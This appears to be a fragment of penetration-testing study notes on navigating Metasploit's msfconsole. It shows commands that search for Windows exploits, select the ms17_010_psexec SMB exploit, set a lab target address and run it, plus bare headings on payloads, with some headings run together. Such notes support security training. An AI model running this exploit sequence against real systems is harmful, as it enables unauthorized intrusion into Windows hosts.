Modules, targets
Modules
<No.> <type>/<os>/<service>/<name>
794 exploit/windows/ftp/scriptftp_listNavigating in msfconsole modules
msf6 > search type:exploit platform:windows cve:2021 rank:excellent microsoft
msf6 > use 0
msf6 exploit(windows/smb/ms17_010_psexec) > options
msf6 exploit(windows/smb/ms17_010_psexec) > info
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.40
msf6 exploit(windows/smb/ms17_010_psexec) > setg RHOSTS 10.10.10.40 # Kepp it the same for all the next work.
msf6 exploit(windows/smb/ms17_010_psexec) > runTargets
Payloads
Staged Payloads
Searching, Selecting and using payloads
Last updated